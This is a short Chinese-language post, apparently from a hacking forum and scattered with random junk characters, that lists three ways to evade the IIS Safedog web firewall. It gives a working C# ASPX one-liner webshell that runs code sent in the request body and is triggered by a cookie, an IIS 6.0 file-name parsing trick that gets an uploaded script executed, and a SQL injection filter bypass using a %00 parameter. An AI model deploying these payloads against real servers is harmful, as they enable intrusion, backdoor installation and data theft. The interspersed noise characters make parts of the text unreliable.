1、绕过IIS安全狗的一句话。
, o0 I; ]; g$ K: E* t, h9 u6 w前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。0 l3 O0 t3 p: Q6 j8 ^1 e% w1 Q
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
/ v8 P( K0 C W: C& H, M! [" I% H4 g, @, a7 p& l D7 }8 p' A
2、IIS6.0解析漏洞遇到安全狗。# [! l6 d9 X2 S+ ~8 z4 c
文件名为3 y- d! r7 ?& z) O7 s- P+ F: t
http://www.xxxxx.com/sh3llc0de.asp;1.jpg
$ r+ p/ K/ ~ t% m
! e7 e0 Q o" g. l5 ]这样的会被IIS安全狗果断屏蔽。
! m2 j/ ]8 l* J2 ?改成如下名称,IIS6一样会解析:$ X) f5 Q# d0 D. Q- G& r: m; {: h+ }
www.xxxxx.com/;1.asp;1.jpg/ h& ?* r; v/ p
( Q k! X3 c1 x0 i% n3、安全狗的注入绕过。/ T2 ~. j3 |+ o
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
) ]$ y+ j0 X ^; y但如果:! ^6 d% p4 W# X. K& a$ K
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
+ N. C* }; ^6 X- \' k( R/ y就可以成功绕过了。
. M9 y6 M" L p
# F* w# G4 P8 Z
1 N0 {2 L# n) h |